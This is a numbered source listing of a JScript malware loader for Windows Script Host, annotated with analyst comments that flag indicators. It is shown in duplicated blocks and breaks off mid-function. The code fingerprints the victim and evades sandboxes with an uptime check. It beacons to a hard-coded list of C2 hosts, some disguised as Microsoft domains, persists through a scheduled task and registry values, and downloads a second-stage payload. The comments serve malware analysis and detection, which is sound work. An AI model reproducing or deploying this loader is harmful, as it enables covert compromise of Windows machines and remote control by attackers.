  2409. var architecture = Windows.GetArch();
  2410. var nonce = DataTools.Random.String(12);
  2411. var uid = Loader.GetUid();
  2412. var sessionKey = nonce + config.C2_OB_KEY;
  2413.  
  2414. var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
  2415. encodedId = Base64Encode(encodedId);
  2416. encodedId = encodeURIComponent(encodedId);
  2417.  
  2418. var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
  2419. pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
  2420.  
  2421. var filename = uid.concat(".bin");
  2422.  
  2423. Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
  2424. return temp.concat("\\").concat(filename);
  2425.  
  2426. }
  2427.  
  // Check-in loop: exits if uptime <= 3000 s (sandbox / fresh-VM check); then
  // up to C2_FAIL_COUNT passes over PRIMARY_C2, XOR-decoding each body and
  // looking for the '<<<CLIENT__' marker. On success the C2 and uid are
  // recorded in the registry and Persist() installs the client. Exceptions
  // are swallowed; C2_REQUEST_SLEEP seconds are slept after every host.
  2428. Loader.DeployClient = function() {
  2429. if (Loader.Uptime <= 3000) {
  2430. WScript.Quit(0);
  2431. }
  2432.  
  2433. for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
  2434. for (var j = 0; j < config.PRIMARY_C2.length; j++) {
  2435. try {
  2436. var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
  2437. response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
  2438.  
  2439. if (response.indexOf('<<<CLIENT__') !== -1) {
  2440. var client = response.replace('<<<CLIENT__', '');
  2441. client = Base64text(client);
  2442.  
  2443. Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
  2444. Windows.RegWrite("SetupServiceKey", Loader.GetUid());
  2445.  
  2446. SELECTED_C2 = config.PRIMARY_C2[j];
  2447. Loader.Persist(client);
  2448. return;
  2449.  
  2450. }
  2451. } catch (e) {
  2452.  
  2453. }
  2454.  
  2455. WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
  2456. }
  2457. }
  2458. }
  2459.  
  // Persistence: scheduled task TASK_NAME running PERSIST_COMMAND every 6
  // minutes; client script stored in ServerUrl and dropped to
  // C:\Users\Public\Disk0.js; this loader's own source stored in WebLib32;
  // decoy file at NTFILE_PATH; then DeployHost(). Task name, the two
  // C:\Users\Public paths and the REG_ROOT values are the remediation list.
  2460. Loader.Persist = function(client){
  2461.  
  2462. var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
  2463. var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
  2464.  
  2465. Windows.Execute(taskCommand);
  2466. Windows.RegWrite("ServerUrl", client);
  2467. Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
  2468.  
  2469. Windows.CreateFile(GlobalStrings.NTFILE_PATH);
  2470.  
  2471. Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
  2472.  
  2473. Loader.DeployHost();
  2474. }
  2475.  
  // Popup helper (repeated copy); not called anywhere in this section.
  2476. function debug(message){
  2477. ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
  2478. }
  2479.  
  2480.  
  // base64 -> UTF-8 text via MSXML bin.Base64 and a binary-to-text
  // ADODB.Stream (repeated copy). Stream is never closed.
  2481. function Base64text(string){
  2482. var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
  2483. var element = XmlDOM.createElement("tempContainer");
  2484. element.dataType = "bin.Base64";
  2485. element.text = string;
  2486.  
  2487. var stream = WScript.CreateObject("ADODB.Stream");
  2488. stream.Type = 1;
  2489. stream.Open();
  2490. stream.Write(element.nodeTypedValue);
  2491.  
  2492. stream.Position = 0;
  2493. stream.Type = 2;
  2494. stream.CharSet = "utf-8";
  2495.  
  2496. return stream.ReadText();
  2497. }
  2498.  
  // string -> byte array through an ADODB.Stream written as "ascii" text and
  // read back in binary mode (repeated copy). Non-ASCII characters may be
  // altered; the stream is never closed.
  2499. function StringToBinary(string){
  2500. var BinaryStream = new ActiveXObject("ADODB.Stream");
  2501. BinaryStream.Type = 2;
  2502. BinaryStream.CharSet = "ascii";
  2503. BinaryStream.Open();
  2504. BinaryStream.WriteText(string);
  2505. BinaryStream.Position = 0;
  2506. BinaryStream.Type = 1;
  2507. BinaryStream.Position = 0;
  2508. return BinaryStream.Read();
  2509. }
  2510.  
  2511.  
  // base64 -> open binary ADODB.Stream, returned for the caller
  // (Windows.WriteBytes) to save and close (repeated copy).
  2512. function Base64bytes(string){
  2513. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
  2514. var element = XmlDOM.createElement("Base64Data");
  2515. element.dataType = "bin.base64";
  2516.  
  2517. element.text = string;
  2518.  
  2519. var stream = WScript.CreateObject("ADODB.Stream");
  2520. stream.Type = 1;
  2521. stream.Open();
  2522.  
  2523. stream.Write(element.nodeTypedValue);
  2524. return stream;
  2525. }
  2526.  
  // ASCII string -> base64 via MSXML (repeated copy). Strips newlines and
  // every "//" from the output; the latter alters the encoding for inputs
  // whose base64 form contains that sequence.
  2527. function Base64Encode(string) {
  2528.  
  2529. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
  2530. var element = XmlDOM.createElement("Base64Data");
  2531. element.dataType = "bin.base64";
  2532.  
  2533. element.nodeTypedValue = StringToBinary(string);
  2534.  
  2535. return element.text.replace(/\n/g, "").replace(/\/\//g, "");
  2536. }
  2537.  
  2538.  
  // Entry point (repeated copy): DeployClient() runs only when the file is
  // executed on its own (CLIENT_IMPORT_ENV not predefined by an eval'ing
  // stub). NOTE(review): `config` is assigned below this statement; it is
  // undefined here unless an earlier assignment exists in the full script.
  2539. if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
  2540. Loader.DeployClient();
  2541. }
  // Build configuration / indicators. PRIMARY_C2 is tried in order; the first
  // three entries resemble legitimate Microsoft/CDN hostnames, so verify each
  // host before treating it as attacker-controlled. C2_FAIL_SLEEP is not
  // referenced in this section; C2_OB_KEY is the static secret mixed into
  // DeriveKey; C2_PREFIX is the check-in endpoint (/rpc.aspx).
  2542. var config = {
  2543. PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
  2544. SOFT_SIG : 'mad29',
  2545. SOFT_VERSION: 32,
  2546. C2_REQUEST_SLEEP : 21,
  2547. C2_FAIL_SLEEP : 21,
  2548. C2_FAIL_COUNT : 20,
  2549. C2_OB_KEY : 'JxTRG4mY',
  2550.  
  2551.  
  2552. C2_PREFIX : 'rpc.aspx'
  2553. }
  2554.  
  2555.  
  // C2 used by DeployHost; overwritten by DeployClient with the host that answered.
  2556. var SELECTED_C2 = config.PRIMARY_C2[0];
  2557.  
  2558.  
  // Unconditional Math.imul polyfill (32-bit multiply) needed by
  // DataTools.Hash (repeated copy).
  2559. Math.imul = function (a, b) {
  2560. var ah = (a >>> 16) & 0xffff;
  2561. var al = a & 0xffff;
  2562. var bh = (b >>> 16) & 0xffff;
  2563. var bl = b & 0xffff;
  2564. return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
  2565. };
  2566.  
  2567.  
  // GlobalStrings (repeated copy): REG_ROOT is the loader's state key;
  // TASK_LOOP_CREATE, NTFILE_PATH, PERSIST_COMMAND and TASK_NAME are used by
  // Loader.Persist; WMIC_EXEC(_ARGS), TASK_CREATE and ADS_SSID are not
  // referenced in this section. Task name, the two C:\Users\Public paths and
  // the registry key are the durable host indicators.
  2568. var GlobalStrings = {
  2569. REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
  2570. WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
  2571. WMIC_EXEC : "wmic process call create \"%path%\"",
  2572. TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
  2573. TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
  2574. NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
  2575. ADS_SSID : "HDDScan",
  2576. PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
  2577. TASK_NAME : "Disk Diagnostics"
  2578. }
  2579.  
  2580.  
  // ObjectProducer (repeated copy): COM factory mapping short keys to the
  // ProgIDs instantiated via ActiveXObject. This ProgID set instantiated from
  // a Windows Script Host process is a useful hunting signal.
  2581. var ObjectProducer = {}
  2582. ObjectProducer.AccesibleObjects = {
  2583. MAIN_SH_OBJECT : 'WScript.Shell',
  2584. STREAM_ACCESS_OBJECT : 'ADODB.Stream',
  2585. XML_TREE_OBJECT : 'Microsoft.XMLDOM',
  2586. XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
  2587. HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
  2588. FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
  2589. };
  2590.  
  // Constructor used for every COM instantiation.
  2591. ObjectProducer.GetRootConstructor = function(){
  2592. return ActiveXObject;
  2593. }
  2594.  
  // Instantiates the COM object whose ProgID is stored under instanceKey.
  2595. ObjectProducer.GetInstance = function(instanceKey){
  2596. var rootConstructor = ObjectProducer.GetRootConstructor();
  2597. return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
  2598. }
  2599.  
  2600.  
  2601.  
  // DataTools (repeated copy): obfuscation / encoding helpers.
  2602. var DataTools = {};
  2603. DataTools.KEY_BASE = 1029;
  2604.  
  // XOR-folds keyStr into KEY_BASE and returns the digit sum — a two-digit
  // XOR key at most, so RotString output is trivially recoverable.
  2605. DataTools.DeriveKey = function(keyStr){
  2606. var keyBase = DataTools.KEY_BASE;
  2607. var key = 0;
  2608.  
  2609. for(var i = 0; i < keyStr.length; i++){
  2610. keyBase = keyBase ^ keyStr.charCodeAt(i);
  2611. }
  2612.  
  2613. var _keyBase = keyBase.toString();
  2614. for(var i = 0; i < _keyBase.length; i++){
  2615. key += parseInt(_keyBase.charAt(i));
  2616. }
  2617.  
  2618. return key;
  2619. }
  2620.  
  // Single-key XOR of every code unit; self-inverse.
  2621. DataTools.RotString = function(str, key){
  2622. var rotd = "";
  2623. for(var i = 0; i < str.length; i++){
  2624. rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
  2625. }
  2626.  
  2627. return rotd;
  2628. }
  2629.  
  // 32-bit multiplicative hash (seed 0xdeadbeef, multiplier 2654435761) as
  // lowercase hex; feeds the victim id. Needs the Math.imul polyfill.
  2630. DataTools.Hash = function(str){
  2631. for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
  2632. h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
  2633.  
  2634. return ((h ^ h >>> 16) >>> 0).toString(16);
  2635. }
  2636.  
  // Math.random-based helpers (not cryptographic).
  2637. DataTools.Random = {};
  2638. DataTools.Random.Number = function(min, max){
  2639. min = Math.ceil(min);
  2640. max = Math.floor(max);
  2641. return Math.floor(Math.random() * (max - min + 1)) + min;
  2642. }
  2643.  
  // len random lowercase letters (URL padding, nonce, decoy file content).
  2644. DataTools.Random.String = function(len){
  2645. var alphabet = "qwertyuiopasdfghjklzxcvbnm";
  2646. var result = "";
  2647. for(var i = 0; i < len; i++){
  2648. var chr = DataTools.Random.Number(0, alphabet.length-1);
  2649. result = result.concat(alphabet.charAt(chr));
  2650. }
  2651.  
  2652. return result;
  2653. }
  2654.  
  2655.  
  2656. DataTools.Strings = {};
  // Fills %key% placeholders in str from a "k=v&k2=v2" string; only the first
  // occurrence of each placeholder is replaced.
  2657. DataTools.Strings.ParseTemplate = function(str, templateStr){
  2658. var template = templateStr.split('&');
  2659. for(var i = 0; i < template.length; i++){
  2660. var keyValue = template[i].split('=');
  2661. str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
  2662. }
  2663.  
  2664. return str;
  2665. }
  2666.  
  // Windows (repeated copy): shell / registry / file / WMI wrappers.
  2667. var Windows = {};
  2668. Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
  2669. Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
  2670.  
  // Runs command via WScript.Shell.Run.
  2671. Windows.Execute = function(command){
  2672. Windows.CoMainObject.Run(command);
  2673. }
  2674.  
  // Expands %VAR% references.
  2675. Windows.GetEnv = function(env){
  2676. return Windows.CoMainObject.ExpandEnvironmentStrings(env);
  2677. }
  2678.  
  2679. Windows.RegRead = function(path){
  2680. return Windows.CoMainObject.RegRead(path);
  2681. }
  2682.  
  // Writes under GlobalStrings.REG_ROOT (HKCU\Software\ApplicationContainer\
  // Appsw64), where the loader keeps its C2, victim id, client script and own
  // source — the primary host indicator for the family.
  2683. Windows.RegWrite = function(entry, value){
  2684. Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
  2685. }
  2686.  
  // Decoy file: one line of 1024 random letters.
  2687. Windows.CreateFile = function(path){
  2688. var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
  2689. fHandle.WriteLine(DataTools.Random.String(1024));
  2690. fHandle.Close();
  2691. }
  2692.  
  // Text write into the alternate data stream path:stream; unused here.
  2693. Windows.AppendDataStream = function(path, stream, data){
  2694. var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
  2695. fHandle.WriteLine(data);
  2696. fHandle.Close();
  2697. }
  2698.  
  // Binary write (ADODB.Stream) into the alternate data stream; unused here.
  2699. Windows.AppendDataStreamB = function(path, stream, data){
  2700. data.SaveToFile(path.concat(":").concat(stream), 2);
  2701. data.Close();
  2702. }
  2703.  
  // Text write to path (overwrite); drops Disk0.js in Loader.Persist.
  2704. Windows.WriteData = function(path, data){
  2705. var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
  2706. fHandle.Write(data);
  2707. fHandle.Close();
  2708. }
  2709.  
  // Saves and closes an ADODB.Stream (mode 2 = overwrite); used for the
  // second-stage .bin.
  2710. Windows.WriteBytes = function(path, data){
  2711. data.SaveToFile(path, 2);
  2712. data.Close();
  2713. }
  2714.  
  // Same as AppendDataStreamB; unused here.
  2715. Windows.WriteDataStreamBytes = function(path, stream, data){
  2716. data.SaveToFile(path.concat(":").concat(stream), 2);
  2717. data.Close();
  2718. }
  2719.  
  // Whole file as text; the text stream is never closed.
  2720. Windows.ReadFile = function(path){
  2721. var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
  2722. return fHandle.ReadAll();
  2723. }
  2724.  
  2725. Windows.GetWMIProvider = function(pcname){
  2726. return GetObject("winmgmts:"+
  2727. "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
  2728. }
  2729.  
  // Uptime in seconds via WMI; 0 on any failure (which makes DeployClient exit).
  2730. Windows.GetUptime = function(){
  2731. try{
  2732. var wmi = Windows.GetWMIProvider(".");
  2733. var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
  2734. var e = new Enumerator(queryResult);
  2735.  
  2736. return parseInt(e.item().SystemUpTime);
  2737. }catch(e){
  2738. return 0;
  2739. }
  2740. }
  2741.  
  // "32" if ProductName contains "Windows 7", else "64" — an OS-name
  // heuristic, not a bitness check; only feeds the rtag= C2 parameter.
  2742. Windows.GetArch = function(){
  2743. var architecture = "64";
  2744. var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
  2745.  
  2746. if(product.indexOf('Windows 7') != -1){
  2747. architecture = "32";
  2748. }
  2749.  
  2750. return architecture;
  2751. }
  2752.  
  2753.  
  // Http (repeated copy): synchronous GET through one MSXML2.XMLHTTP client.
  // Returns the body on HTTP 200, "" on any other status or exception; no
  // headers are set, so the default User-Agent goes out with every request.
  2754. var Http = {};
  2755. Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
  2756. Http.Request = function(url){
  2757. try{
  2758. Http.Client.Open('GET', url, false);
  2759. Http.Client.Send();
  2760.  
  2761. if(Http.Client.Status == 200)
  2762. return Http.Client.ResponseText;
  2763. else
  2764. return "";
  2765. }catch(e){
  2766. return ""
  2767. }
  2768. }
  2769.  
  2770.  
  // Host profile and beaconing logic. The environment values below are captured once at load time.
  2771. var Loader = {};
  2772. Loader.USERNAME = Windows.GetEnv("%username%");
  2773. Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
  2774. Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
  2775. Loader.Uptime = Windows.GetUptime();
  // "true" when the computer name differs from the user domain; looks like a domain-joined indicator - not confirmable here.
  2776. Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
  2777.  
  // Host identifier: hex hash of the profile fields with the build number appended as text
  // (Hash returns a string, so '+' concatenates). Persisted as the SetupServiceKey registry value.
  2778. Loader.GetUid = function(){
  2779. return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
  2780. }
  2781.  
  // Registration payload: colon-joined profile, XORed with a key derived from nonce + C2_OB_KEY,
  // then base64 and URL encoded. The nonce itself travels in the clear as the 'ubwG' parameter.
  2782. Loader.GetInitialRequest = function(nonce){
  2783. var uid = Loader.GetUid();
  2784. var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
  2785.  
  2786. var sessionKey = nonce + config.C2_OB_KEY;
  2787. request = request.join(":");
  2788. request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
  2789. request = Base64Encode(request);
  2790.  
  2791. return encodeURIComponent(request);
  2792. }
  2793.  
  // Beacon path: fixed query names (winrm, view2, regclid, client, service_id, ubwG) around random
  // filler; the constant parts are a usable network signature.
  2794. Loader.GetInitialEndpoint = function(){
  2795. var nonce = DataTools.Random.String(12)
  2796. var request = Loader.GetInitialRequest(nonce);
  2797.  
  2798. var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic&regclid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
  2799. return endpoint;
  2800. }
  2801.  
  // Fetches the next payload from the selected C2 (/go.aspx), decodes it with a key derived from the
  // UID, and drops it as %temp%\<uid>.bin. An empty HTTP response still produces an (empty) file.
  2802. Loader.DeployHost = function(){
  2803. var temp = Windows.GetEnv("%temp%");
  2804. var architecture = Windows.GetArch();
  2805. var nonce = DataTools.Random.String(12);
  2806. var uid = Loader.GetUid();
  2807. var sessionKey = nonce + config.C2_OB_KEY;
  2808.  
  2809. var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
  2810. encodedId = Base64Encode(encodedId);
  2811. encodedId = encodeURIComponent(encodedId);
  2812.  
  2813. var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
  2814. pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
  2815.  
  2816. var filename = uid.concat(".bin");
  2817.  
  2818. Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
  2819. return temp.concat("\\").concat(filename);
  2820.  
  2821. }
  2822.  
  // Main registration loop. Exits when uptime is <= 3000 seconds (GetUptime also returns 0 on WMI
  // failure, so that case exits too). Tries every host C2_FAIL_COUNT times, sleeping C2_REQUEST_SLEEP
  // seconds after each attempt; errors are swallowed. A response carrying the '<<<CLIENT__' marker is
  // base64-decoded, the answering host and the UID are written to the registry (ShimV4, SetupServiceKey),
  // and Persist is called.
  2823. Loader.DeployClient = function() {
  2824. if (Loader.Uptime <= 3000) {
  2825. WScript.Quit(0);
  2826. }
  2827.  
  2828. for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
  2829. for (var j = 0; j < config.PRIMARY_C2.length; j++) {
  2830. try {
  2831. var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
  2832. response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
  2833.  
  2834. if (response.indexOf('<<<CLIENT__') !== -1) {
  2835. var client = response.replace('<<<CLIENT__', '');
  2836. client = Base64text(client);
  2837.  
  2838. Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
  2839. Windows.RegWrite("SetupServiceKey", Loader.GetUid());
  2840.  
  2841. SELECTED_C2 = config.PRIMARY_C2[j];
  2842. Loader.Persist(client);
  2843. return;
  2844.  
  2845. }
  2846. } catch (e) {
  2847.  
  2848. }
  2849.  
  2850. WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
  2851. }
  2852. }
  2853. }
  2854.  
  // Persistence and staging: registers a scheduled task that runs every 6 minutes, stores the decoded
  // second stage (ServerUrl) and a copy of this script's own source (WebLib32) in the registry, drops
  // the decoy .ini and the stage-2 .js into C:\Users\Public, then fetches the binary payload via DeployHost.
  2855. Loader.Persist = function(client){
  2856.  
  2857. var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
  2858. var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
  2859.  
  2860. Windows.Execute(taskCommand);
  2861. Windows.RegWrite("ServerUrl", client);
  2862. Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
  2863.  
  2864. Windows.CreateFile(GlobalStrings.NTFILE_PATH);
  2865.  
  2866. Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
  2867.  
  2868. Loader.DeployHost();
  2869. }
  2870.  
  // Message box via WScript.Shell.Popup; not called anywhere in the visible script.
  2871. function debug(message){
  2872. ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
  2873. }
  2874.  
  2875.  
  // Decodes a base64 string to UTF-8 text (MSXML bin.base64 -> ADODB.Stream). The stream is left open.
  2876. function Base64text(string){
  2877. var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
  2878. var element = XmlDOM.createElement("tempContainer");
  2879. element.dataType = "bin.Base64";
  2880. element.text = string;
  2881.  
  2882. var stream = WScript.CreateObject("ADODB.Stream");
  2883. stream.Type = 1;
  2884. stream.Open();
  2885. stream.Write(element.nodeTypedValue);
  2886.  
  2887. stream.Position = 0;
  2888. stream.Type = 2;
  2889. stream.CharSet = "utf-8";
  2890.  
  2891. return stream.ReadText();
  2892. }
  2893.  
  // Converts text to a byte array through an "ascii" ADODB.Stream (type 2 = text, then 1 = binary).
  // Non-ASCII characters presumably do not survive that charset - not confirmable here. Stream left open.
  2894. function StringToBinary(string){
  2895. var BinaryStream = new ActiveXObject("ADODB.Stream");
  2896. BinaryStream.Type = 2;
  2897. BinaryStream.CharSet = "ascii";
  2898. BinaryStream.Open();
  2899. BinaryStream.WriteText(string);
  2900. BinaryStream.Position = 0;
  2901. BinaryStream.Type = 1;
  2902. BinaryStream.Position = 0;
  2903. return BinaryStream.Read();
  2904. }
  2905.  
  2906.  
  // Decodes base64 into an open binary ADODB.Stream; the caller (Windows.WriteBytes) saves and closes it.
  2907. function Base64bytes(string){
  2908. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
  2909. var element = XmlDOM.createElement("Base64Data");
  2910. element.dataType = "bin.base64";
  2911.  
  2912. element.text = string;
  2913.  
  2914. var stream = WScript.CreateObject("ADODB.Stream");
  2915. stream.Type = 1;
  2916. stream.Open();
  2917.  
  2918. stream.Write(element.nodeTypedValue);
  2919. return stream;
  2920. }
  2921.  
  // Base64-encodes text via MSXML. Strips the line breaks the encoder inserts and also removes every
  // "//" sequence, which alters any output that legitimately contains two adjacent '/' characters.
  2922. function Base64Encode(string) {
  2923.  
  2924. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
  2925. var element = XmlDOM.createElement("Base64Data");
  2926. element.dataType = "bin.base64";
  2927.  
  2928. element.nodeTypedValue = StringToBinary(string);
  2929.  
  2930. return element.text.replace(/\n/g, "").replace(/\/\//g, "");
  2931. }
  2932.  
  2933.  
  // Entry point: runs the registration flow only when CLIENT_IMPORT_ENV has not been defined by a
  // caller, i.e. when this script is executed directly rather than evaluated as a library.
  2934. if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
  2935. Loader.DeployClient();
  2936. }
  // Loader configuration read by the Loader/DataTools code below.
  //   PRIMARY_C2       : ordered list of C2 hosts; DeployClient tries them in order.
  //   SOFT_SIG/VERSION : campaign tag and build number sent in every beacon and folded into the host UID.
  //   C2_REQUEST_SLEEP : seconds slept after each beacon attempt that did not succeed.
  //   C2_FAIL_COUNT    : number of passes over the host list before giving up.
  //   C2_OB_KEY        : static secret mixed into DataTools.DeriveKey for request/response obfuscation.
  //   C2_PREFIX        : path component of the beacon URL.
  // C2_FAIL_SLEEP is not referenced anywhere in the visible script.
  // All hosts are plain http://, so the beacon URL and its parameters are visible on the wire.
  2937. var config = {
  2938. PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
  2939. SOFT_SIG : 'mad29',
  2940. SOFT_VERSION: 32,
  2941. C2_REQUEST_SLEEP : 21,
  2942. C2_FAIL_SLEEP : 21,
  2943. C2_FAIL_COUNT : 20,
  2944. C2_OB_KEY : 'JxTRG4mY',
  2945.  
  2946.  
  2947. C2_PREFIX : 'rpc.aspx'
  2948. }
  2949.  
  2950.  
  // Active C2 host: starts as the first list entry and is overwritten by Loader.DeployClient with whichever host answered.
  2951. var SELECTED_C2 = config.PRIMARY_C2[0];
  2952.  
  2953.  
  // Polyfill for 32-bit integer multiplication (not available in legacy JScript).
  // The only consumer in this script is DataTools.Hash.
  2954. Math.imul = function (a, b) {
  2955. var ah = (a >>> 16) & 0xffff;
  2956. var al = a & 0xffff;
  2957. var bh = (b >>> 16) & 0xffff;
  2958. var bl = b & 0xffff;
  2959. return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
  2960. };
  2961.  
  2962.  
  // Static strings used for persistence and file drops; useful host-based indicators:
  //   REG_ROOT         : every Windows.RegWrite lands under this HKCU key.
  //   TASK_LOOP_CREATE : schtasks template filled by Loader.Persist (task "Disk Diagnostics", every 6 minutes).
  //   PERSIST_COMMAND  : what the task runs - explorer.exe opening a .js in C:\Users\Public.
  //   NTFILE_PATH      : decoy file filled with random text by Windows.CreateFile.
  // WMIC_EXEC_ARGS, WMIC_EXEC, TASK_CREATE and ADS_SSID are not referenced in the visible script;
  // presumably consumed by the second-stage code this loader fetches - not confirmable here.
  2963. var GlobalStrings = {
  2964. REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
  2965. WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
  2966. WMIC_EXEC : "wmic process call create \"%path%\"",
  2967. TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
  2968. TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
  2969. NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
  2970. ADS_SSID : "HDDScan",
  2971. PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
  2972. TASK_NAME : "Disk Diagnostics"
  2973. }
  2974.  
  2975.  
  // Small factory over ActiveXObject keyed by symbolic name. Only MAIN_SH_OBJECT, FS_DRIVE_OBJECT and
  // HTTP_CLIENT_OBJECT are requested through GetInstance in the visible script; the stream/XML helpers
  // further down instantiate their COM objects directly.
  2976. var ObjectProducer = {}
  2977. ObjectProducer.AccesibleObjects = {
  2978. MAIN_SH_OBJECT : 'WScript.Shell',
  2979. STREAM_ACCESS_OBJECT : 'ADODB.Stream',
  2980. XML_TREE_OBJECT : 'Microsoft.XMLDOM',
  2981. XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
  2982. HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
  2983. FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
  2984. };
  2985.  
  // Returns the ActiveXObject constructor itself; the extra hop has no visible effect beyond indirection.
  2986. ObjectProducer.GetRootConstructor = function(){
  2987. return ActiveXObject;
  2988. }
  2989.  
  // Instantiates the COM object whose ProgID is registered under instanceKey.
  2990. ObjectProducer.GetInstance = function(instanceKey){
  2991. var rootConstructor = ObjectProducer.GetRootConstructor();
  2992. return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
  2993. }
  2994.  
  2995.  
  2996.  
  // Obfuscation and helper routines.
  2997. var DataTools = {};
  2998. DataTools.KEY_BASE = 1029;
  2999.  
  // XOR-folds every char code into KEY_BASE, then sums the decimal digits of the result.
  // The returned key is therefore always a small non-negative integer.
